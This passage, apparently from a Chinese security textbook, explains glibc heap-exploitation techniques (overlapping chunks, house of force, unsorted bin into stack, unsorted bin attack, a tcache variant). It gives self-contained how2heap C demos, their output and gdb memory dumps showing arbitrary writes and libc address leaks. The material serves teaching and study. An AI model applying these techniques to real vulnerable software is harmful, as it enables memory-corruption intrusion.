0x6021a0:    0x4141414141414141    0x0000000000020e61  <-- top chunk
0x6021b0:    0x0000000000000000    0x0000000000000000
0x6021c0:    0x0000000000000000    0x0000000000000000
0x6021d0:    0x0000000000000000    0x0000000000000000
gef➤  heap bins unsorted
[ Unsorted Bin for arena 'main_arena' ]
[+] unsorted_bins[0]: fw=0x602090, bk=0x602090
 →   Chunk(addr=0x6020a0, size=0x90, flags=PREV_INUSE)

chunk 2 被放到了 unsorted bin 中，其 size 值为 0x90。

接下来，假设我们有一个溢出漏洞，可以改写 chunk 2 的 size 值，比如这里我们将其改为 0x111，也就是原本 chunk 2 和 chunk 3 的大小相加，最后一位是 1 表示 chunk 1 是在使用的，其实有没有都无所谓。

gef➤  heap bins unsorted
[ Unsorted Bin for arena 'main_arena' ]
[+] unsorted_bins[0]: fw=0x602090, bk=0x602090
 →   Chunk(addr=0x6020a0, size=0x110, flags=PREV_INUSE)

这时 unsorted bin 中的数据也更改了。

接下来 malloc 一个大小的等于 chunk 2 和 chunk 3 之和的 chunk 4，这会将 chunk 2 和 chunk 3 都包含进来：

gef➤  x/60gx 0x602010-0x10
0x602000:    0x0000000000000000    0x0000000000000091  <-- chunk 1
0x602010:    0x4141414141414141    0x4141414141414141
0x602020:    0x4141414141414141    0x4141414141414141
0x602030:    0x4141414141414141    0x4141414141414141
0x602040:    0x4141414141414141    0x4141414141414141
0x602050:    0x4141414141414141    0x4141414141414141
0x602060:    0x4141414141414141    0x4141414141414141
0x602070:    0x4141414141414141    0x4141414141414141
0x602080:    0x4141414141414141    0x4141414141414141
0x602090:    0x4141414141414141    0x0000000000000111  <-- chunk 4
0x6020a0:    0x00007ffff7dd1b78    0x00007ffff7dd1b78
0x6020b0:    0x4141414141414141    0x4141414141414141
0x6020c0:    0x4141414141414141    0x4141414141414141
0x6020d0:    0x4141414141414141    0x4141414141414141
0x6020e0:    0x4141414141414141    0x4141414141414141
0x6020f0:    0x4141414141414141    0x4141414141414141
0x602100:    0x4141414141414141    0x4141414141414141
0x602110:    0x4141414141414141    0x4141414141414141
0x602120:    0x0000000000000090    0x0000000000000080  <-- chunk 3
0x602130:    0x4141414141414141    0x4141414141414141
0x602140:    0x4141414141414141    0x4141414141414141
0x602150:    0x4141414141414141    0x4141414141414141
0x602160:    0x4141414141414141    0x4141414141414141
0x602170:    0x4141414141414141    0x4141414141414141
0x602180:    0x4141414141414141    0x4141414141414141
0x602190:    0x4141414141414141    0x4141414141414141
0x6021a0:    0x4141414141414141    0x0000000000020e61  <-- top chunk
0x6021b0:    0x0000000000000000    0x0000000000000000
0x6021c0:    0x0000000000000000    0x0000000000000000
0x6021d0:    0x0000000000000000    0x0000000000000000

这样，相当于 chunk 4 和 chunk 3 就重叠了，两个 chunk 可以互相修改对方的数据。就像上面的运行结果打印出来的那样。

overlapping_chunks_2

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <malloc.h>

int main() {
    intptr_t *p1,*p2,*p3,*p4,*p5,*p6;
    unsigned int real_size_p1,real_size_p2,real_size_p3,real_size_p4,real_size_p5,real_size_p6;
    int prev_in_use = 0x1;

    p1 = malloc(0x10);
    p2 = malloc(0x80);
    p3 = malloc(0x80);
    p4 = malloc(0x80);
    p5 = malloc(0x10);
    real_size_p1 = malloc_usable_size(p1);
    real_size_p2 = malloc_usable_size(p2);
    real_size_p3 = malloc_usable_size(p3);
    real_size_p4 = malloc_usable_size(p4);
    real_size_p5 = malloc_usable_size(p5);
    memset(p1, 'A', real_size_p1);
    memset(p2, 'A', real_size_p2);
    memset(p3, 'A', real_size_p3);
    memset(p4, 'A', real_size_p4);
    memset(p5, 'A', real_size_p5);
    fprintf(stderr, "Now we allocate 5 chunks on the heap\n\n");
    fprintf(stderr, "chunk p1: %p ~ %p\n", p1, (unsigned char *)p1+malloc_usable_size(p1));
    fprintf(stderr, "chunk p2: %p ~ %p\n", p2, (unsigned char *)p2+malloc_usable_size(p2));
    fprintf(stderr, "chunk p3: %p ~ %p\n", p3, (unsigned char *)p3+malloc_usable_size(p3));
    fprintf(stderr, "chunk p4: %p ~ %p\n", p4, (unsigned char *)p4+malloc_usable_size(p4));
    fprintf(stderr, "chunk p5: %p ~ %p\n", p5, (unsigned char *)p5+malloc_usable_size(p5));

    free(p4);
    fprintf(stderr, "\nLet's free the chunk p4\n\n");

    fprintf(stderr, "Emulating an overflow that can overwrite the size of chunk p2 with (size of chunk_p2 + size of chunk_p3)\n\n");
    *(unsigned int *)((unsigned char *)p1 + real_size_p1) = real_size_p2 + real_size_p3 + prev_in_use + sizeof(size_t) * 2; // BUG HERE

    free(p2);

    p6 = malloc(0x1b0 - 0x10);
    real_size_p6 = malloc_usable_size(p6);
    fprintf(stderr, "Allocating a new chunk 6: %p ~ %p\n\n", p6, (unsigned char *)p6+real_size_p6);

    fprintf(stderr, "Now p6 and p3 are overlapping, if we memset(p6, 'B', 0xd0)\n");
    fprintf(stderr, "p3 before = %s\n", (char *)p3);
    memset(p6, 'B', 0xd0);
    fprintf(stderr, "p3 after  = %s\n", (char *)p3);
}
$ gcc -g overlapping_chunks_2.c
$ ./a.out
Now we allocate 5 chunks on the heap

chunk p1: 0x18c2010 ~ 0x18c2028
chunk p2: 0x18c2030 ~ 0x18c20b8
chunk p3: 0x18c20c0 ~ 0x18c2148
chunk p4: 0x18c2150 ~ 0x18c21d8
chunk p5: 0x18c21e0 ~ 0x18c21f8

Let's free the chunk p4

Emulating an overflow that can overwrite the size of chunk p2 with (size of chunk_p2 + size of chunk_p3)

Allocating a new chunk 6: 0x18c2030 ~ 0x18c21d8

Now p6 and p3 are overlapping, if we memset(p6, 'B', 0xd0)
p3 before = AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�
p3 after  = BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�

同样是堆块重叠的问题，前面那个是在 chunk 已经被 free，加入到了 unsorted bin 之后，再修改其 size 值，然后 malloc 一个不一样的 chunk 出来，而这里是在 free 之前修改 size 值，使 free 错误地修改了下一个 chunk 的 prev_size 值，导致中间的 chunk 强行合并。另外前面那个重叠是相邻堆块之间的，而这里是不相邻堆块之间的。

我们需要五个堆块，假设第 chunk 1 存在溢出，可以改写第二个 chunk 2 的数据，chunk 5 的作用是防止释放 chunk 4 后被合并进 top chunk。所以我们要重叠的区域是 chunk 2 到 chunk 4。首先将 chunk 4 释放掉，注意看 chunk 5 的 prev_size 值：

gef➤  x/70gx 0x602010-0x10
0x602000:    0x0000000000000000    0x0000000000000021  <-- chunk 1
0x602010:    0x4141414141414141    0x4141414141414141
0x602020:    0x4141414141414141    0x0000000000000091  <-- chunk 2
0x602030:    0x4141414141414141    0x4141414141414141
0x602040:    0x4141414141414141    0x4141414141414141
0x602050:    0x4141414141414141    0x4141414141414141
0x602060:    0x4141414141414141    0x4141414141414141
0x602070:    0x4141414141414141    0x4141414141414141
0x602080:    0x4141414141414141    0x4141414141414141
0x602090:    0x4141414141414141    0x4141414141414141
0x6020a0:    0x4141414141414141    0x4141414141414141
0x6020b0:    0x4141414141414141    0x0000000000000091  <-- chunk 3
0x6020c0:    0x4141414141414141    0x4141414141414141
0x6020d0:    0x4141414141414141    0x4141414141414141
0x6020e0:    0x4141414141414141    0x4141414141414141
0x6020f0:    0x4141414141414141    0x4141414141414141
0x602100:    0x4141414141414141    0x4141414141414141
0x602110:    0x4141414141414141    0x4141414141414141
0x602120:    0x4141414141414141    0x4141414141414141
0x602130:    0x4141414141414141    0x4141414141414141
0x602140:    0x4141414141414141    0x0000000000000091  <-- chunk 4 [be freed]
0x602150:    0x00007ffff7dd1b78    0x00007ffff7dd1b78      <-- fd, bk pointer
0x602160:    0x4141414141414141    0x4141414141414141
0x602170:    0x4141414141414141    0x4141414141414141
0x602180:    0x4141414141414141    0x4141414141414141
0x602190:    0x4141414141414141    0x4141414141414141
0x6021a0:    0x4141414141414141    0x4141414141414141
0x6021b0:    0x4141414141414141    0x4141414141414141
0x6021c0:    0x4141414141414141    0x4141414141414141
0x6021d0:    0x0000000000000090    0x0000000000000020  <-- chunk 5 <-- prev_size
0x6021e0:    0x4141414141414141    0x4141414141414141
0x6021f0:    0x4141414141414141    0x0000000000020e11  <-- top chunk
0x602200:    0x0000000000000000    0x0000000000000000
0x602210:    0x0000000000000000    0x0000000000000000
0x602220:    0x0000000000000000    0x0000000000000000
gef➤  heap bins unsorted
[ Unsorted Bin for arena 'main_arena' ]
[+] unsorted_bins[0]: fw=0x602140, bk=0x602140
 →   Chunk(addr=0x602150, size=0x90, flags=PREV_INUSE)

free chunk 4 被放入 unsorted bin，大小为 0x90。

接下来是最关键的一步，利用 chunk 1 的溢出漏洞，将 chunk 2 的 size 值修改为 chunk 2 和 chunk 3 的大小之和，即 0x90+0x90+0x1=0x121，最后的 1 是标志位。这样当我们释放 chunk 2 的时候，malloc 根据这个被修改的 size 值，会以为 chunk 2 加上 chunk 3 的区域都是要释放的，然后就错误地修改了 chunk 5 的 prev_size。接着，它发现紧邻的一块 chunk 4 也是 free 状态，就把它俩合并在了一起，组成一个大 free chunk，放进 unsorted bin 中。

gef➤  x/70gx 0x602010-0x10
0x602000:    0x0000000000000000    0x0000000000000021  <-- chunk 1
0x602010:    0x4141414141414141    0x4141414141414141
0x602020:    0x4141414141414141    0x00000000000001b1  <-- chunk 2 [be freed] <-- unsorted bin
0x602030:    0x00007ffff7dd1b78    0x00007ffff7dd1b78      <-- fd, bk pointer
0x602040:    0x4141414141414141    0x4141414141414141
0x602050:    0x4141414141414141    0x4141414141414141
0x602060:    0x4141414141414141    0x4141414141414141
0x602070:    0x4141414141414141    0x4141414141414141
0x602080:    0x4141414141414141    0x4141414141414141
0x602090:    0x4141414141414141    0x4141414141414141
0x6020a0:    0x4141414141414141    0x4141414141414141
0x6020b0:    0x4141414141414141    0x0000000000000091  <-- chunk 3
0x6020c0:    0x4141414141414141    0x4141414141414141
0x6020d0:    0x4141414141414141    0x4141414141414141
0x6020e0:    0x4141414141414141    0x4141414141414141
0x6020f0:    0x4141414141414141    0x4141414141414141
0x602100:    0x4141414141414141    0x4141414141414141
0x602110:    0x4141414141414141    0x4141414141414141
0x602120:    0x4141414141414141    0x4141414141414141
0x602130:    0x4141414141414141    0x4141414141414141
0x602140:    0x4141414141414141    0x0000000000000091  <-- chunk 4 [be freed]
0x602150:    0x00007ffff7dd1b78    0x00007ffff7dd1b78
0x602160:    0x4141414141414141    0x4141414141414141
0x602170:    0x4141414141414141    0x4141414141414141
0x602180:    0x4141414141414141    0x4141414141414141
0x602190:    0x4141414141414141    0x4141414141414141
0x6021a0:    0x4141414141414141    0x4141414141414141
0x6021b0:    0x4141414141414141    0x4141414141414141
0x6021c0:    0x4141414141414141    0x4141414141414141
0x6021d0:    0x00000000000001b0    0x0000000000000020  <-- chunk 5 <-- prev_size
0x6021e0:    0x4141414141414141    0x4141414141414141
0x6021f0:    0x4141414141414141    0x0000000000020e11  <-- top chunk
0x602200:    0x0000000000000000    0x0000000000000000
0x602210:    0x0000000000000000    0x0000000000000000
0x602220:    0x0000000000000000    0x0000000000000000
gef➤  heap bins unsorted
[ Unsorted Bin for arena 'main_arena' ]
[+] unsorted_bins[0]: fw=0x602020, bk=0x602020
 →   Chunk(addr=0x602030, size=0x1b0, flags=PREV_INUSE)

现在 unsorted bin 里的 chunk 的大小为 0x1b0，即 0x90*3。咦，所以 chunk 3 虽然是使用状态，但也被强行算在了 free chunk 的空间里了。

最后，如果我们分配一块大小为 0x1b0-0x10 的大空间，返回的堆块即是包括了 chunk 2 + chunk 3 + chunk 4 的大 chunk。这时 chunk 6 和 chunk 3 就重叠了，结果就像上面运行时打印出来的一样。

3.1.8 Linux 堆利用（下）

how2heap
参考资料

下载文件

how2heap

house_of_force

#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <malloc.h>

char bss_var[] = "This is a string that we want to overwrite.";

int main() {
    fprintf(stderr, "We will overwrite a variable at %p\n\n", bss_var);

    intptr_t *p1 = malloc(0x10);
    int real_size = malloc_usable_size(p1);
    memset(p1, 'A', real_size);
    fprintf(stderr, "Let's allocate the first chunk of 0x10 bytes: %p.\n", p1);
    fprintf(stderr, "Real size of our allocated chunk is 0x%x.\n\n", real_size);

    intptr_t *ptr_top = (intptr_t *) ((char *)p1 + real_size);
    fprintf(stderr, "Overwriting the top chunk size with a big value so the malloc will never call mmap.\n");
    fprintf(stderr, "Old size of top chunk: %#llx\n", *((unsigned long long int *)ptr_top));
    ptr_top[0] = -1;
    fprintf(stderr, "New size of top chunk: %#llx\n", *((unsigned long long int *)ptr_top));

    unsigned long evil_size = (unsigned long)bss_var - sizeof(long)*2 - (unsigned long)ptr_top;
    fprintf(stderr, "\nThe value we want to write to at %p, and the top chunk is at %p, so accounting for the header size, we will malloc %#lx bytes.\n", bss_var, ptr_top, evil_size);
    void *new_ptr = malloc(evil_size);
    int real_size_new = malloc_usable_size(new_ptr);
    memset((char *)new_ptr + real_size_new - 0x20, 'A', 0x20);
    fprintf(stderr, "As expected, the new pointer is at the same place as the old top chunk: %p\n", new_ptr);

    void* ctr_chunk = malloc(0x30);
    fprintf(stderr, "malloc(0x30) => %p!\n", ctr_chunk);
    fprintf(stderr, "\nNow, the next chunk we overwrite will point at our target buffer, so we can overwrite the value.\n");

    fprintf(stderr, "old string: %s\n", bss_var);
    strcpy(ctr_chunk, "YEAH!!!");
    fprintf(stderr, "new string: %s\n", bss_var);
}
$ gcc -g house_of_force.c
$ ./a.out
We will overwrite a variable at 0x601080

Let's allocate the first chunk of 0x10 bytes: 0x824010.
Real size of our allocated chunk is 0x18.

Overwriting the top chunk size with a big value so the malloc will never call mmap.
Old size of top chunk: 0x20fe1
New size of top chunk: 0xffffffffffffffff

The value we want to write to at 0x601080, and the top chunk is at 0x824028, so accounting for the header size, we will malloc 0xffffffffffddd048 bytes.
As expected, the new pointer is at the same place as the old top chunk: 0x824030
malloc(0x30) => 0x601080!

Now, the next chunk we overwrite will point at our target buffer, so we can overwrite the value.
old string: This is a string that we want to overwrite.
new string: YEAH!!!

house_of_force 是一种通过改写 top chunk 的 size 字段来欺骗 malloc 返回任意地址的技术。我们知道在空闲内存的最高处，必然存在一块空闲的 chunk，即 top chunk，当 bins 和 fast bins 都不能满足分配需要的时候，malloc 会从 top chunk 中分出一块内存给用户。所以 top chunk 的大小会随着分配和回收不停地变化。这种攻击假设有一个溢出漏洞，可以改写 top chunk 的头部，然后将其改为一个非常大的值，以确保所有的 malloc 将使用 top chunk 分配，而不会调用 mmap。这时如果攻击者 malloc 一个很大的数目（负有符号整数），top chunk 的位置加上这个大数，造成整数溢出，结果是 top chunk 能够被转移到堆之前的内存地址（如程序的 .bss 段、.data 段、GOT 表等），下次再执行 malloc 时，攻击者就能够控制转移之后地址处的内存。

首先随意分配一个 chunk，此时内存里存在两个 chunk，即 chunk 1 和 top chunk：

gef➤  x/8gx 0x602010-0x10
0x602000:    0x0000000000000000    0x0000000000000021  <-- chunk 1
0x602010:    0x4141414141414141    0x4141414141414141
0x602020:    0x4141414141414141    0x0000000000020fe1  <-- top chunk
0x602030:    0x0000000000000000    0x0000000000000000

chunk 1 真实可用的内存有 0x18 字节。

假设 chunk 1 存在溢出，利用该漏洞我们现在将 top chunk 的 size 值改为一个非常大的数：

gef➤  x/8gx 0x602010-0x10
0x602000:    0x0000000000000000    0x0000000000000021  <-- chunk 1
0x602010:    0x4141414141414141    0x4141414141414141
0x602020:    0x4141414141414141    0xffffffffffffffff  <-- modified top chunk
0x602030:    0x0000000000000000    0x0000000000000000

改写之后的 size==0xffffffff。

现在我们可以 malloc 一个任意大小的内存而不用调用 mmap 了。接下来 malloc 一个 chunk，使得该 chunk 刚好分配到我们想要控制的那块区域为止，这样在下一次 malloc 时，就可以返回到我们想要控制的区域了。计算方法是用目标地址减去 top chunk 地址，再减去 chunk 头的大小。

gef➤  x/8gx 0x602010-0x10
0x602000:    0x0000000000000000    0x0000000000000021
0x602010:    0x4141414141414141    0x4141414141414141
0x602020:    0x4141414141414141    0xfffffffffffff051
0x602030:    0x0000000000000000    0x0000000000000000
gef➤  x/12gx 0x602010+0xfffffffffffff050
0x601060:    0x4141414141414141    0x4141414141414141
0x601070:    0x4141414141414141    0x0000000000000fa9  <-- top chunk
0x601080 <bss_var>:    0x2073692073696854    0x676e697274732061  <-- target
0x601090 <bss_var+16>:    0x6577207461687420    0x6f7420746e617720
0x6010a0 <bss_var+32>:    0x6972777265766f20    0x00000000002e6574
0x6010b0:    0x0000000000000000    0x0000000000000000

再次 malloc，将目标地址包含进来即可，现在我们就成功控制了目标内存：

gef➤  x/12gx 0x602010+0xfffffffffffff050
0x601060:    0x4141414141414141    0x4141414141414141
0x601070:    0x4141414141414141    0x0000000000000041  <-- chunk 2
0x601080 <bss_var>:    0x2073692073696854    0x676e697274732061  <-- target
0x601090 <bss_var+16>:    0x6577207461687420    0x6f7420746e617720
0x6010a0 <bss_var+32>:    0x6972777265766f20    0x00000000002e6574
0x6010b0:    0x0000000000000000    0x0000000000000f69  <-- top chunk

该技术的缺点是会受到 ASLR 的影响，因为如果攻击者需要修改指定位置的内存，他首先需要知道当前 top chunk 的位置以构造合适的 malloc 大小来转移 top chunk。而 ASLR 将使堆内存地址随机，所以该技术还需同时配合使用信息泄漏以达成攻击。

unsorted_bin_into_stack

#include <stdio.h>
#include <stdlib.h>

int main() {
    unsigned long stack_buf[4] = {0};

    unsigned long *victim  = malloc(0x80);
    unsigned long *p1 = malloc(0x10);
    fprintf(stderr, "Allocating the victim chunk at %p\n", victim);

    // deal with tcache
    // int *k[10], i;
    // for (i = 0; i < 7; i++) {
    //     k[i] = malloc(0x80);
    // }
    // for (i = 0; i < 7; i++) {
    //     free(k[i]);
    // }

    free(victim);
    fprintf(stderr, "Freeing the chunk, it will be inserted in the unsorted bin\n\n");

    stack_buf[1] = 0x100 + 0x10;
    stack_buf[3] = (unsigned long)stack_buf;        // or any other writable address
    fprintf(stderr, "Create a fake chunk on the stack\n");
    fprintf(stderr, "fake->size: %p\n", (void *)stack_buf[1]);
    fprintf(stderr, "fake->bk: %p\n\n", (void *)stack_buf[3]);

    victim[1] = (unsigned long)stack_buf;
    fprintf(stderr, "Now we overwrite the victim->bk pointer to stack: %p\n\n", stack_buf);

    fprintf(stderr, "Malloc a chunk which size is 0x110 will return the region of our fake chunk: %p\n", &stack_buf[2]);

    unsigned long *fake = malloc(0x100);
    fprintf(stderr, "malloc(0x100): %p\n", fake);
}
$ gcc -g unsorted_bin_into_stack.c
$ ./a.out
Allocating the victim chunk at 0x17a1010
Freeing the chunk, it will be inserted in the unsorted bin

Create a fake chunk on the stack
fake->size: 0x110
fake->bk: 0x7fffcd906480

Now we overwrite the victim->bk pointer to stack: 0x7fffcd906480

Malloc a chunk which size is 0x110 will return the region of our fake chunk: 0x7fffcd906490
malloc(0x100): 0x7fffcd906490

unsorted-bin-into-stack 通过改写 unsorted bin 里 chunk 的 bk 指针到任意地址，从而在栈上 malloc 出 chunk。

首先将一个 chunk 放入 unsorted bin，并且在栈上伪造一个 chunk：

gdb-peda$ x/6gx victim - 2
0x602000:    0x0000000000000000    0x0000000000000091  <-- victim chunk
0x602010:    0x00007ffff7dd1b78    0x00007ffff7dd1b78
0x602020:    0x0000000000000000    0x0000000000000000
gdb-peda$ x/4gx stack_buf
0x7fffffffdbc0:    0x0000000000000000    0x0000000000000110  <-- fake chunk
0x7fffffffdbd0:    0x0000000000000000    0x00007fffffffdbc0

然后假设有一个漏洞，可以改写 victim chunk 的 bk 指针，那么将其改为指向 fake chunk：

gdb-peda$ x/6gx victim - 2
0x602000:    0x0000000000000000    0x0000000000000091  <-- victim chunk
0x602010:    0x00007ffff7dd1b78    0x00007fffffffdbc0    <-- bk pointer
0x602020:    0x0000000000000000    0x0000000000000000
gdb-peda$ x/4gx stack_buf
0x7fffffffdbc0:    0x0000000000000000    0x0000000000000110  <-- fake chunk
0x7fffffffdbd0:    0x0000000000000000    0x00007fffffffdbc0

那么此时就相当于 fake chunk 已经被链接到 unsorted bin 中。在下一次 malloc 的时候，malloc 会顺着 bk 指针进行遍历，于是就找到了大小正好合适的 fake chunk：

gdb-peda$ x/6gx victim - 2
0x602000:    0x0000000000000000    0x0000000000000091  <-- victim chunk
0x602010:    0x00007ffff7dd1bf8    0x00007ffff7dd1bf8
0x602020:    0x0000000000000000    0x0000000000000000
gdb-peda$ x/4gx fake - 2
0x7fffffffdbc0:    0x0000000000000000    0x0000000000000110  <-- fake chunk
0x7fffffffdbd0:    0x00007ffff7dd1b78    0x00007fffffffdbc0

fake chunk 被取出，而 victim chunk 被从 unsorted bin 中取出来放到了 small bin 中。另外值得注意的是 fake chunk 的 fd 指针被修改了，这是 unsorted bin 的地址，通过它可以泄露 libc 地址，这正是下面 unsorted bin attack 会讲到的。

将上面的代码解除注释，就是 libc-2.27 环境下的版本，但是需要注意的是由于 tcache 的影响，stack_buf[3] 不能再设置成任意地址。

malloc 前：

gdb-peda$ x/6gx victim - 2
0x555555756250: 0x0000000000000000      0x0000000000000091  <-- victim chunk
0x555555756260: 0x00007ffff7dd2b00      0x00007fffffffdcb0
0x555555756270: 0x0000000000000000      0x0000000000000000
gdb-peda$ x/4gx stack_buf
0x7fffffffdcb0: 0x0000000000000000      0x0000000000000110  <-- fake chunk
0x7fffffffdcc0: 0x0000000000000000      0x00007fffffffdcb0
gdb-peda$ x/26gx 0x0000555555756000+0x10
0x555555756010: 0x0700000000000000      0x0000000000000000  <-- counts
0x555555756020: 0x0000000000000000      0x0000000000000000
0x555555756030: 0x0000000000000000      0x0000000000000000
0x555555756040: 0x0000000000000000      0x0000000000000000
0x555555756050: 0x0000000000000000      0x0000000000000000
0x555555756060: 0x0000000000000000      0x0000000000000000
0x555555756070: 0x0000000000000000      0x0000000000000000
0x555555756080: 0x0000000000000000      0x0000555555756670  <-- entries
0x555555756090: 0x0000000000000000      0x0000000000000000
0x5555557560a0: 0x0000000000000000      0x0000000000000000
0x5555557560b0: 0x0000000000000000      0x0000000000000000
0x5555557560c0: 0x0000000000000000      0x0000000000000000
0x5555557560d0: 0x0000000000000000      0x0000000000000000

malloc 后：

gdb-peda$ x/6gx victim - 2
0x555555756250: 0x0000000000000000      0x0000000000000091  <-- victim chunk
0x555555756260: 0x00007ffff7dd2b80      0x00007ffff7dd2b80
0x555555756270: 0x0000000000000000      0x0000000000000000
gdb-peda$ x/4gx fake - 2
0x7fffffffdcb0: 0x0000000000000000      0x0000000000000110  <-- fake chunk
0x7fffffffdcc0: 0x00007ffff7dd2b00      0x00007fffffffdcb0
gdb-peda$ x/26gx 0x0000555555756000+0x10
0x555555756010: 0x0700000000000000      0x0700000000000000  <-- counts  <-- counts
0x555555756020: 0x0000000000000000      0x0000000000000000
0x555555756030: 0x0000000000000000      0x0000000000000000
0x555555756040: 0x0000000000000000      0x0000000000000000
0x555555756050: 0x0000000000000000      0x0000000000000000
0x555555756060: 0x0000000000000000      0x0000000000000000
0x555555756070: 0x0000000000000000      0x0000000000000000
0x555555756080: 0x0000000000000000      0x0000555555756670  <-- entries
0x555555756090: 0x0000000000000000      0x0000000000000000
0x5555557560a0: 0x0000000000000000      0x0000000000000000
0x5555557560b0: 0x0000000000000000      0x0000000000000000
0x5555557560c0: 0x0000000000000000      0x00007fffffffdcc0  <-- entries
0x5555557560d0: 0x0000000000000000      0x0000000000000000

可以看到在 malloc 时，fake chunk 被不断重复地链接到 tcache bin，直到装满后，才从 unsorted bin 里取出。同样的，fake chunk 的 fd 指向 unsorted bin。

unsorted_bin_attack

#include <stdio.h>
#include <stdlib.h>

int main() {
    unsigned long stack_var = 0;
    fprintf(stderr, "The target we want to rewrite on stack: %p -> %ld\n\n", &stack_var, stack_var);

    unsigned long *p  = malloc(0x80);
    unsigned long *p1 = malloc(0x10);
    fprintf(stderr, "Now, we allocate first small chunk on the heap at: %p\n",p);

    free(p);
    fprintf(stderr, "We free the first chunk now. Its bk pointer point to %p\n", (void*)p[1]);

    p[1] = (unsigned long)(&stack_var - 2);
    fprintf(stderr, "We write it with the target address-0x10: %p\n\n", (void*)p[1]);

    malloc(0x80);
    fprintf(stderr, "Let's malloc again to get the chunk we just free: %p -> %p\n", &stack_var, (void*)stack_var);
}
$ gcc -g unsorted_bin_attack.c
$ ./a.out
The target we want to rewrite on stack: 0x7ffc9b1d61b0 -> 0

Now, we allocate first small chunk on the heap at: 0x1066010
We free the first chunk now. Its bk pointer point to 0x7f2404cf5b78
We write it with the target address-0x10: 0x7ffc9b1d61a0

Let's malloc again to get the chunk we just free: 0x7ffc9b1d61b0 -> 0x7f2404cf5b78

unsorted bin 攻击通常是为更进一步的攻击做准备的，我们知道 unsorted bin 是一个双向链表，在分配时会通过 unlink 操作将 chunk 从链表中移除，所以如果能够控制 unsorted bin chunk 的 bk 指针，就可以向任意位置写入一个指针。这里通过 unlink 将 libc 的信息写入到我们可控的内存中，从而导致信息泄漏，为进一步的攻击提供便利。

unlink 的对 unsorted bin 的操作是这样的：

          /* remove from unsorted list */
          unsorted_chunks (av)->bk = bck;
          bck->fd = unsorted_chunks (av);

其中 bck = victim->bk。

首先分配两个 chunk，然后释放掉第一个，它将被加入到 unsorted bin 中：

gef➤  x/26gx 0x602010-0x10
0x602000:    0x0000000000000000    0x0000000000000091  <-- chunk 1 [be freed]
0x602010:    0x00007ffff7dd1b78    0x00007ffff7dd1b78      <-- fd, bk pointer
0x602020:    0x0000000000000000    0x0000000000000000
0x602030:    0x0000000000000000    0x0000000000000000
0x602040:    0x0000000000000000    0x0000000000000000
0x602050:    0x0000000000000000    0x0000000000000000
0x602060:    0x0000000000000000    0x0000000000000000
0x602070:    0x0000000000000000    0x0000000000000000
0x602080:    0x0000000000000000    0x0000000000000000
0x602090:    0x0000000000000090    0x0000000000000020  <-- chunk 2
0x6020a0:    0x0000000000000000    0x0000000000000000
0x6020b0:    0x0000000000000000    0x0000000000020f51  <-- top chunk
0x6020c0:    0x0000000000000000    0x0000000000000000
gef➤  x/4gx &stack_var-2
0x7fffffffdc50:    0x00007fffffffdd60    0x0000000000400712
0x7fffffffdc60:    0x0000000000000000    0x0000000000602010
gef➤  heap bins unsorted
[ Unsorted Bin for arena 'main_arena' ]
[+] unsorted_bins[0]: fw=0x602000, bk=0x602000
 →   Chunk(addr=0x602010, size=0x90, flags=PREV_INUSE)

然后假设存在一个溢出漏洞，可以让我们修改 chunk 1 的数据。然后我们将 chunk 1 的 bk 指针修改为指向目标地址 - 2，也就相当于是在目标地址处有一个 fake free chunk，然后 malloc：

gef➤  x/26gx 0x602010-0x10
0x602000:    0x0000000000000000    0x0000000000000091  <-- chunk 3
0x602010:    0x00007ffff7dd1b78    0x00007fffffffdc50
0x602020:    0x0000000000000000    0x0000000000000000
0x602030:    0x0000000000000000    0x0000000000000000
0x602040:    0x0000000000000000    0x0000000000000000
0x602050:    0x0000000000000000    0x0000000000000000
0x602060:    0x0000000000000000    0x0000000000000000
0x602070:    0x0000000000000000    0x0000000000000000
0x602080:    0x0000000000000000    0x0000000000000000
0x602090:    0x0000000000000090    0x0000000000000021  <-- chunk 2
0x6020a0:    0x0000000000000000    0x0000000000000000
0x6020b0:    0x0000000000000000    0x0000000000020f51  <-- top chunk
0x6020c0:    0x0000000000000000    0x0000000000000000
gef➤  x/4gx &stack_var-2
0x7fffffffdc50:    0x00007fffffffdc80    0x0000000000400756  <-- fake chunk
0x7fffffffdc60:    0x00007ffff7dd1b78    0x0000000000602010      <-- fd->TAIL

从而泄漏了 unsorted bin 的头部地址。

那么继续来看 libc-2.27 里怎么处理：

#include <stdio.h>
#include <stdlib.h>

int main() {
    unsigned long stack_var = 0;
    fprintf(stderr, "The target we want to rewrite on stack: %p -> %ld\n\n", &stack_var, stack_var);

    unsigned long *p = malloc(0x80);
    unsigned long *p1 = malloc(0x10);
    fprintf(stderr, "Now, we allocate first small chunk on the heap at: %p\n",p);

    free(p);
    fprintf(stderr, "Freed the first chunk to put it in a tcache bin\n");

    p[0] = (unsigned long)(&stack_var);
    fprintf(stderr, "Overwrite the next ptr with the target address\n");
    malloc(0x80);
    malloc(0x80);
    fprintf(stderr, "Now we malloc twice to make tcache struct's counts '0xff'\n\n");

    free(p);
    fprintf(stderr, "Now free again to put it in unsorted bin\n");
    p[1] = (unsigned long)(&stack_var - 2);
    fprintf(stderr, "Now write its bk ptr with the target address-0x10: %p\n\n", (void*)p[1]);

    malloc(0x80);
    fprintf(stderr, "Finally malloc again to get the chunk at target address: %p -> %p\n", &stack_var, (void*)stack_var);
}
$ gcc -g tcache_unsorted_bin_attack.c
$ ./a.out
The target we want to rewrite on stack: 0x7ffef0884c10 -> 0

Now, we allocate first small chunk on the heap at: 0x564866907260
Freed the first chunk to put it in a tcache bin
Overwrite the next ptr with the target address
Now we malloc twice to make tcache struct's counts '0xff'

Now free again to put it in unsorted bin
Now write its bk ptr with the target address-0x10: 0x7ffef0884c00

Finally malloc again to get the chunk at target address: 0x7ffef0884c10 -> 0x7f69ba1d8ca0

